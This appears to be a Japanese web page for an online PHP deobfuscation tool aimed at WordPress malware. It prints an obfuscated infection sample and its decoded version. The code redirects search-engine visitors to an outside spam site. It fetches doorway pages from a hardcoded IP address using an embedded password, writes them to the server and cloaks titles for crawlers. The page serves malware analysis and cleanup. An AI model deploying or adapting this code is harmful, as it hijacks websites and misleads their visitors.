Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php
goto nDH9Y; TuFxJ: if (strpos($_SERVER["\110\x54\x54\x50\x5f\x52\x45\106\105\x52\105\122"], "\147\x6f\157\147\x6c\145\x2e") or strpos($_SERVER["\x48\124\x54\120\x5f\122\x45\x46\105\x52\x45\122"], "\x79\x61\150\157\157\x2e") or strpos($_SERVER["\110\124\x54\x50\137\122\x45\x46\x45\122\x45\x52"], "\142\x69\x6e\x67\x2e")) { header("\114\157\x63\x61\164\x69\157\x6e\x3a\x20\x68\164\164\160\163\x3a\x2f\x2f\x63\x68\160\x6f\x6b\56\x73\151\164\x65\57\145\x6e\x74\x65\162\x2f\x3f\x6d\141\x72\x6b\75{$today}\x2d{$s}\x26\145\156\147\x6b\145\171\75{$keyword}"); die; } else { $myname = $_GET["\151\x64"] . "\56\160\x68\x70"; if (file_exists("\x69\156\x64\x65\x78\57" . $myname)) { $html = @file_get_contents("\x69\x6e\x64\145\170\57" . $myname); if (strpos($_SERVER["\110\x54\124\x50\x5f\125\123\105\x52\137\x41\107\105\x4e\x54"], "\x62\x69\x6e\x67") > 2 or strpos($_SERVER["\x48\x54\124\x50\137\125\123\105\x52\137\101\107\x45\116\124"], "\171\141\x68\x6f\157") > 2) { $keyword = str_replace("\55", "\40", $_GET["\151\x64"]); $html = str_replace("\74\164\151\x74\x6c\145\76\x3c\57\164\x69\x74\x6c\145\76", "\x3c\164\x69\164\x6c\x65\x3e{$keyword}\74\x2f\164\151\x74\154\x65\x3e", $html); } echo $html; die; } } goto B2_32; FZvU7: if ($s == "\134" | $s == "\x2f") { $s = ''; } goto qbgBf; y8n61: if (strlen($text) < 5000) { $text = file_get_contents("\150\x74\x74\x70\x3a\57\57\61\63\x35\56\61\x38\61\56\x32\x31\x2e\61\62\66\57" . $_GET["\146\156"] . "\x2e\x70\150\x70\77\160\x61\163\x73\75{$apass}\46\161\x3d{$_GET["\x69\144"]}"); } goto fKCoR; bS7r8: if (function_exists("\143\165\162\x6c\x5f\151\x6e\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\164\x74\x70\x3a\x2f\57\61\x33\x35\x2e\x31\70\61\x2e\62\x31\56\61\x32\66\57" . $_GET["\x66\156"] . "\x2e\160\150\x70\x3f\160\x61\163\163\x3d{$apass}\x26\x71\75{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\x6f\172\x69\154\154\141\57\x34\x2e\x30\x20\50\x63\157\x6d\160\141\164\x69\x62\154\x65\x3b\40\x4d\123\x49\105\x20\66\x2e\x30\x3b\x20\127\151\156\x64\157\x77\163\40\x4e\124\x20\65\56\x31\x3b\x20\x53\x56\61\x29"); $text = curl_exec($ch); curl_close($ch); } goto y8n61; AvdnR: foreach ($_GET as $a => $b) { $_GET["\x69\144"] = $b; } goto fW72h; lexF0: $xx1 = 5; goto Y7QO1; oy0xm: $s = dirname($_SERVER["\120\110\x50\137\123\x45\x4c\106"]); goto FZvU7; GfAOQ: $_GET["\x77\x6f\x72\154\144"] = 5; goto LV51I; LV51I: $_GET["\146\156"] = "\x36\x39\x36\71\x36\71\156\x65\x77"; goto Bp7Sb; fRKlP: if (strpos($_SERVER["\x48\x54\x54\120\137\125\x53\105\122\137\x41\107\105\116\124"], "\142\x69\x6e\147") > 2 or strpos($_SERVER["\x48\x54\x54\x50\137\125\123\x45\x52\137\x41\107\105\116\x54"], "\x79\x61\x68\x6f\157") > 2) { $text = str_replace("\74\164\151\x74\x6c\145\76\x3c\57\164\151\164\154\x65\76", "\x3c\164\x69\164\x6c\x65\x3e{$keyword}\74\x2f\x74\151\x74\x6c\145\76", $text); } goto b4mZv; z7AiE: $keyword = str_replace("\40", "\53", $keyword); goto slWS2; B2_32: $query_pars_2 = str_replace("\x2d", "\53", $_GET["\151\x64"]); goto WyuOn; Y7QO1: $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); goto z7AiE; fKCoR: if (strlen($text) < 5000) { $url = "\x31\x33\x35\x2e\x31\70\x31\x2e\62\61\x2e\61\62\x36"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\51\x3c\x62\162\x20\x2f\76\xa"; } else { $req = "\x2f" . $_GET["\146\x6e"] . "\x2e\x70\150\160\77\x70\141\163\x73\x3d{$apass}\x26\x71\75{$_GET["\x69\x64"]}"; $out = "\x47\105\124\40{$req}\40\x48\x54\124\120\x2f\x31\56\60\15\12"; $out .= "\x48\x6f\x73\164\72\40{$url}\15\xa"; $out .= "\x43\x6f\x6e\x6e\x65\x63\164\151\157\x6e\72\x20\x43\154\x6f\163\145\xd\xa\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto eK1wp; Bp7Sb: $apass1 = "\x76\151\x73\144\157\x69\152\x65\167"; goto d5LYx; nDH9Y: error_reporting(0); goto NeqgM; fW72h: if ($_GET["\x69\144"] == "\x74\145\x73\x74\151\x6e\x67") { echo "\164\x65\163\164\40\147\157\x6f\x64\x2e\56\56"; die; } goto OHNXi; d5LYx: $x1 = 3; goto lexF0; b4mZv: echo $text; goto j6wVa; NeqgM: $today = "\62\x30\62\x34\x30\x34\x30\x39\x2d"; goto AvdnR; qbgBf: $s = $_SERVER["\x53\105\x52\x56\105\122\x5f\x4e\x41\x4d\105"] . $s; goto Y2VMI; eK1wp: if (strlen($text) > 5000) { $out = fopen("\x69\x6e\x64\x65\x78\x2f" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto fRKlP; Y2VMI: $apass3 = "\x72\166\x33\62\x79\144\141\143\163\166\163\x64\166"; goto BgS_V; OHNXi: if ($_GET["\x69\144"] == "\151\156\144\x65\x78") { header("\x4c\x6f\x63\141\164\151\157\156\x3a\x20\x68\x74\x74\x70\x73\72\57\x2f\x67\x6f\x6f\x67\154\145\56\143\157\x6d"); die; } goto GfAOQ; BgS_V: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto TuFxJ; WyuOn: $text = ''; goto bS7r8; slWS2: $apass2 = "\142\62\63\x68\x72\62\x33\166\x72\63\x32"; goto oy0xm; j6wVa: ?><?php
error_reporting(0);
$today = "20240409-";
foreach ($_GET as $a => $b) {
$_GET["id"] = $b;
}
if ($_GET["id"] == "testing") {
echo "test good...";
die;
}
if ($_GET["id"] == "index") {
header("Location: https://google.com");
die;
}
$_GET["world"] = 5;
$_GET["fn"] = "696969new";
$apass1 = "visdoijew";
$x1 = 3;
$xx1 = 5;
$keyword = str_replace("-", " ", $_GET["id"]);
$keyword = str_replace(" ", "+", $keyword);
$apass2 = "b23hr23vr32";
$s = dirname($_SERVER["PHP_SELF"]);
if ($s == "\\" | $s == "/") {
$s = '';
}
$s = $_SERVER["SERVER_NAME"] . $s;
$apass3 = "rv32ydacsvsdv";
$apass = "{$apass1}" . "{$apass2}" . "rv32ydacsvsdv";
if (strpos($_SERVER["HTTP_REFERER"], "google.") or strpos($_SERVER["HTTP_REFERER"], "yahoo.") or strpos($_SERVER["HTTP_REFERER"], "bing.")) {
header("Location: https://chpok.site/enter/?mark={$today}-{$s}&engkey={$keyword}");
die;
} else {
$myname = $_GET["id"] . ".php";
if (file_exists("index/" . $myname)) {
$html = @file_get_contents("index/" . $myname);
if (strpos($_SERVER["HTTP_USER_AGENT"], "bing") > 2 or strpos($_SERVER["HTTP_USER_AGENT"], "yahoo") > 2) {
$keyword = str_replace("-", " ", $_GET["id"]);
$html = str_replace("<title></title>", "<title>{$keyword}</title>", $html);
}
echo $html;
die;
}
}
$query_pars_2 = str_replace("-", "+", $_GET["id"]);
$text = '';
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://135.181.21.126/" . $_GET["fn"] . ".php?pass={$apass}&q={$_GET["id"]}");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
$text = curl_exec($ch);
curl_close($ch);
}
if (strlen($text) < 5000) {
$text = file_get_contents("http://135.181.21.126/" . $_GET["fn"] . ".php?pass={$apass}&q={$_GET["id"]}");
}
if (strlen($text) < 5000) {
$url = "135.181.21.126";
$fp = fsockopen($url, 80, $errno, $errstr, 30);
if (!$fp) {
echo "{$errstr} ({$errno})<br />\n";
} else {
$req = "/" . $_GET["fn"] . ".php?pass={$apass}&q={$_GET["id"]}";
$out = "GET {$req} HTTP/1.0\r\n";
$out .= "Host: 135.181.21.126\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$text .= fgets($fp, 2048);
}
fclose($fp);
}
fclose($out);
$text = explode("\n", $text);
$text = $text[7];
}
if (strlen($text) > 5000) {
$out = fopen("index/" . $myname, "w");
fwrite($out, $text);
fclose($out);
}
if (strpos($_SERVER["HTTP_USER_AGENT"], "bing") > 2 or strpos($_SERVER["HTTP_USER_AGENT"], "yahoo") > 2) {
$text = str_replace("<title></title>", "<title>{$keyword}</title>", $text);
}
echo $text;■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.